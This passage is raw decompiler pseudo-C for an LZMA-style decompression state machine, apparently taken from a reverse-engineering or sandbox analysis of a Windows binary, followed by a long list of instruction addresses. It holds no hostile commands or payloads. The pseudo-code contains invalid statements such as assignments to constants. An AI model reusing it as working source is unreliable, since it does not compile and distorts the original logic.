											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                  0x00406609
                                                  0x00406609
                                                  0x00406609
                                                  0x00406609
                                                  0x0040660f
                                                  0x00406613
                                                  0x00406617
                                                  0x00406621
                                                  0x0040662f
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x00000000
                                                  0x00000000
                                                  0x00406942
                                                  0x0040694b
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406999
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x00406940
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040699b
                                                  0x0040699b
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00406a50
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x0040691e
                                                  0x00406924
                                                  0x0040692b
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00000000
                                                  0x00406936
                                                  0x004069a0
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406067
                                                  0x00000000
                                                  0x0040606e
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x00406078
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d3
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x0040611d
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x00406147
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x0040618d
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x0040689b
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
